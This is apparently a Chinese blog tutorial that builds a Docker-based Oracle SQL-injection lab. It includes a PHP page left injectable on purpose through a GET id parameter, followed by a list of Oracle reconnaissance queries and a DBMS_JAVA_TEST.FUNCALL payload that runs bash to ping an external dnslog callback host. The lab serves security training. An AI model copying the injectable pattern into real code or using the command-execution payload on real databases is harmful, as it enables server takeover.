使用docker进行oracle数据库渗透测试,测试环境拓扑如下:
#docker下载oracle数据库镜像
docker pull registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
#docker将镜像加载到名称为oracle的容器后台运行,并映射镜像1521端口到本地1521端口
docker run -d -p 1521:1521 --name oracle registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
#进入oracle容器的交互式shell
docker exec -it oracle bash
root@bd849e50bab4:/# sqlplus /nolog
SQL> conn sys/oracle as sysdba
Connected.
SQL> select name from v$database;
NAME
---------
XE
#开辟空间建库
SQL> create tablespace pentest datafile '/tmp/pentest.dbf' size 100m;
Tablespace created.
#创建pentest用户,密码pentest;默认table是pentest
SQL> create user pentest identified by pentest default tablespace pentest;
User created.
#赋权pentest - connect,resource,dba
SQL> grant connect,resource,dba to pentest;
Grant succeeded.
SQL> exit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
#pentest用户连接
root@bd849e50bab4:/# sqlplus pentest/pentest
SQL*Plus: Release 11.2.0.2.0 Production on Fri Feb 19 06:38:04 2021
Copyright (c) 1982, 2011, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
#建表
SQL> CREATE TABLE users (id number,name varchar(500),surname varchar(1000));
Table created.
#导入数据
SQL> INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset');
INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny');
INSERT INTO users (id, name, surname) VALUES (3, 'wu', 'ming');
INSERT INTO users (id, name, surname) VALUES (4, 'sqlmap/1.0-dev (http://sqlmap.org)', 'user agent header');
INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull');
commit;
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL> commit;
Commit complete.
SQL> SELECT * FROM users where id=1;
ID
----------
NAME
--------------------------------------------------------------------------------
SURNAME
--------------------------------------------------------------------------------
1
luther
blisset
docker pull thomasbisignani/docker-apache-php-oracle
cd ~/learn/docker
mkdir oracle_samplePages && cd oracle_samplePages
touch index.php
########
##配置docker-apache-php-oracle这个镜像启动时:
##1、-v :宿主机文件夹/Users/bin4xin/learn/docker/oracle_samplePages中文件可在虚拟机文件夹/var/www/html中被访问到;即:
########宿主机/Users/bin4xin/learn/docker/oracle_samplePages文件夹为docker-apache-php-oracle web服务的根目录
##2、-p :映射docker 80 端口到本机的8090端口下;
##3、-d :后台运行
########
docker run -p 8090:80 -d -v /Users/bin4xin/learn/docker/oracle_samplePages:/var/www/html thomasbisignani/docker-apache-php-oracle
cat index.php
<?php
$username = 'pentest';
$password = 'pentest';
$connectText = '//127.0.0.1:1521/XE';
$conn = oci_connect($username, $password, $connectText);
if (!$conn) {
$e = oci_error();
echo 'Oracle connect failed <br />';
exit($e['message']);
}
echo 'Oracle connect ok'."<br>";
?>
<?php
$username = 'pentest';
$password = 'pentest';
$connectText = '//127.0.0.1:1521/XE';
$conn = oci_connect($username, $password, $connectText);
if (!$conn) {
$e = oci_error();
echo 'Oracle connect failed <br />';
exit($e['message']);
}
echo 'Oracle connect ok' . "<br>";
// Prepare the statement
if (!isset($_GET['id']) || $_GET['id'] == null) {
echo "oracle sqlinjection test: oracle_test.php?id=1</br>";
$stid = oci_parse($conn, "select * from USERS");
} else {
//SQL injection!!!!!!
$stid = oci_parse($conn, "SELECT * FROM users where id=" . $_GET['id']);
}
if (!$stid) {
$e = oci_error($conn);
exit($e['message']);
}
// Perform the logic of the query
$r = oci_execute($stid);
if (!$r) {
$e = oci_error($stid);
exit($e['message']);
}
// Fetch the results of the query
print "<table border='1'>\n";
while ($row = oci_fetch_array($stid, OCI_ASSOC+OCI_RETURN_NULLS)) {
print "<tr>\n";
foreach ($row as $item) {
$item = ($item !== null ? mb_convert_encoding($item, 'utf-8', 'gbk') : " ");
print " <td>" . $item . "</td>\n";
}
print "</tr>\n";
}
print "</table>\n";
oci_free_statement($stid);
oci_close($conn);
?>
至此,注入靶场搭建完毕。SQLMAP注入效果:
渗透常用语句:
# 当前用户权限
select * from session_roles
# 当前数据库版本
select banner from sys.v_$version where rownum=1
# 服务器出口IP
用utl_http.request 可以实现
# 服务器监听IP地址
select utl_inaddr.get_host_address from dual
# 服务器操作系统
select member from v$logfile where rownum=1
# 服务器sid查询,远程连接的话需要
select instance_name fromv$instance;
# 当前连接用户
select SYS_CONTEXT ('USERENV', 'CURRENT_USER')from dual
命令执行:
Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','ping ojuht0.dnslog.cn') from dual;
以上。